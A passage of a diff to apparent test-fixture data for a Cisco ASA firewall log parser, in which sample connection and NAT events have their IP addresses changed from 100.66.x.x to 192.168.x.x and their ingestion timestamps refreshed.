10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", + "ingested": "2021-12-09T13:33:41.995657900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", "start": "2018-10-10T11:36:10.000Z", 
@@ -12415,8 +12415,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165455Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995661900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -12446,8 +12446,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12482,7 +12482,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12491,8 +12491,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165463Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995666800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12508,7 +12508,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11820", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12530,8 +12530,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" 
@@ -12566,7 +12566,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, @@ -12575,8 +12575,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165470800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995673100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12592,7 +12592,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.162.30", + "mapped_source_ip": "192.168.162.30", "connection_id": "11821", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12614,8 +12614,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12650,7 +12650,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12660,8 +12660,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.166751300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", + "ingested": "2021-12-09T13:33:41.995679400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -12698,8 +12698,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12734,7 +12734,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12743,8 +12743,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.166757400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995685600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12760,7 +12760,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11822", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12782,8 +12782,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" @@ -12818,7 +12818,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, 
@@ -12828,8 +12828,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.166764800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", + "ingested": "2021-12-09T13:33:41.995691800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12866,8 +12866,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12902,7 +12902,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12912,8 +12912,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.166773500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", + "ingested": "2021-12-09T13:33:41.995698Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12950,8 +12950,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -12986,7 +12986,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, 
@@ -12995,8 +12995,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.166780Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995704300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13012,7 +13012,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.48.186", + "mapped_source_ip": "192.168.48.186", "connection_id": "11823", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13034,8 +13034,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -13070,7 +13070,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, @@ -13080,8 +13080,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.166785300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", + "ingested": "2021-12-09T13:33:41.995710400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -13113,8 +13113,8 @@ }, "destination": { "port": 8295, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1291, @@ -13154,7 +13154,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13162,8 +13162,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.166832900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295", + "ingested": "2021-12-09T13:33:41.995716700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13196,8 +13196,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13232,7 +13232,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + "192.168.54.190", "172.31.98.44" ] }, @@ -13241,8 +13241,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.166840Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", + "ingested": "2021-12-09T13:33:41.995722900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -13258,7 +13258,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11824", "source_interface": "outside", "mapped_destination_port": 1291 @@ -13280,8 +13280,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13316,7 +13316,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, @@ -13325,8 +13325,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.166846200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995729500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13342,7 +13342,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.254.94", + "mapped_source_ip": "192.168.254.94", "connection_id": "11825", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13364,8 +13364,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13400,7 +13400,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, 
@@ -13410,8 +13410,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.167944800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", + "ingested": "2021-12-09T13:33:41.995735900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -13443,8 +13443,8 @@ }, "destination": { "port": 8296, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1292, @@ -13484,7 +13484,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13492,8 +13492,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.167963Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296", + "ingested": "2021-12-09T13:33:41.995742200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13526,8 +13526,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13562,7 +13562,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + "192.168.54.190", "172.31.98.44" ] }, 
@@ -13571,8 +13571,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.167970200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", + "ingested": "2021-12-09T13:33:41.995748400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13588,7 +13588,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11826", "source_interface": "outside", "mapped_destination_port": 1292 @@ -13605,8 +13605,8 @@ }, "destination": { "port": 8297, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1293, @@ -13646,7 +13646,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13654,8 +13654,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.167975300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297", + "ingested": "2021-12-09T13:33:41.995754600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13688,8 +13688,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -13724,7 +13724,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13733,8 +13733,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.167980600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", + "ingested": "2021-12-09T13:33:41.995760900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13750,7 +13750,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11827", "source_interface": "outside", "mapped_destination_port": 1293 @@ -13767,8 +13767,8 @@ }, "destination": { "port": 8298, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1294, @@ -13808,7 +13808,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13816,8 +13816,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.167986700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298", + "ingested": "2021-12-09T13:33:41.995765700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", "action": "firewall-rule", 
@@ -13850,8 +13850,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13886,7 +13886,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13895,8 +13895,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.167992600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", + "ingested": "2021-12-09T13:33:41.995770800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13912,7 +13912,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11828", "source_interface": "outside", "mapped_destination_port": 1294 @@ -13934,8 +13934,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13970,7 +13970,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -13981,8 +13981,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.167999300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", + "ingested": "2021-12-09T13:33:41.995776400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14014,8 +14014,8 @@ }, "destination": { "port": 8299, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1295, @@ -14055,7 +14055,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14063,8 +14063,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168003800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299", + "ingested": "2021-12-09T13:33:41.995782Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14097,8 +14097,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14133,7 +14133,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -14142,8 +14142,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168016200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", + "ingested": "2021-12-09T13:33:41.995786300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14159,7 +14159,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11829", "source_interface": "outside", "mapped_destination_port": 1295 @@ -14176,8 +14176,8 @@ }, "destination": { "port": 8300, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1296, @@ -14217,7 +14217,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14225,8 +14225,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168022600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300", + "ingested": "2021-12-09T13:33:41.995791200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14259,8 +14259,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -14295,7 +14295,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14304,8 +14304,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168028700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", + "ingested": "2021-12-09T13:33:41.995797500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14321,7 +14321,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11830", "source_interface": "outside", "mapped_destination_port": 1296 @@ -14343,8 +14343,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14379,7 +14379,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14390,8 +14390,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.168036500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", + "ingested": "2021-12-09T13:33:41.995802300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -14428,8 +14428,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14464,7 +14464,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14475,8 +14475,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.168041100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", + "ingested": "2021-12-09T13:33:41.995806900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14513,8 +14513,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14549,7 +14549,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14560,8 +14560,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.168047600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", + "ingested": "2021-12-09T13:33:41.995810800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
